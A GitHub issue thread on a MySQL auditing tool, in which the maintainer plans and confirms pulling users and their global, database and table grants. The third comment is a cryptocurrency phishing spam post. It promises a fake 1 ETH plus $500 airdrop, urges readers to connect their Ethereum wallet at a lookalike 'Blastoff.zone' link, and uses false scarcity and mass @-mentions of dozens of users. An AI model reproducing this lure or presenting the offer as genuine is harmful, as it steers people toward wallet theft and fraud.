### ISSUE TITLE
Pulling User config

### ISSUE THREAD

**Issue by Niecke** [Niecke/mysql_auditor#4]
This process should be triggered via a Button on the UI. Later it could be a background Job, but for now doing in manual should be fine.

The process should collect All users from the database and their privileges.

**Comment by Niecke** [comment]
Users with their global grants, the database and table grants are pulled.

**Comment by aerosonic-jp** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
evantancy, @ipapoutsidis, @okeeffed, @gzzengwei, @YFKxenigsegg, @yosephbernandus, @Danish811, @HoThinh468, @quynguyen2303, @grilled-pasta, @timdamen, @dmrdvn, @AshutoshSingh72, @kiranojhanp, @DeimoSecurity, @ugurcemozturk, @Raunak-727, @VaheHar, @bgebes, @JoseYCobian, @snowrui, @ivladous, @eray-onur, @kazimics, @Alexxmao, @knife-co, @dbsc, @Shoreasg, @ChengYiLin, @erdevg, @FarajaCephas, @guillermoaviles, @Not-Sarthak, @Ozancann01, @BhavyaSheth22, @vietthai2512, @zihoulaai, @AlexiaChen, @DamilolaAdegunwa, @appfromape, @mektigboy, @homemadestea58, @kareniel, @agergo, @erhant, @Karansidds, @derhaodh, @Abhishek2022, @hyadav2k, @Mdimransiddiquee
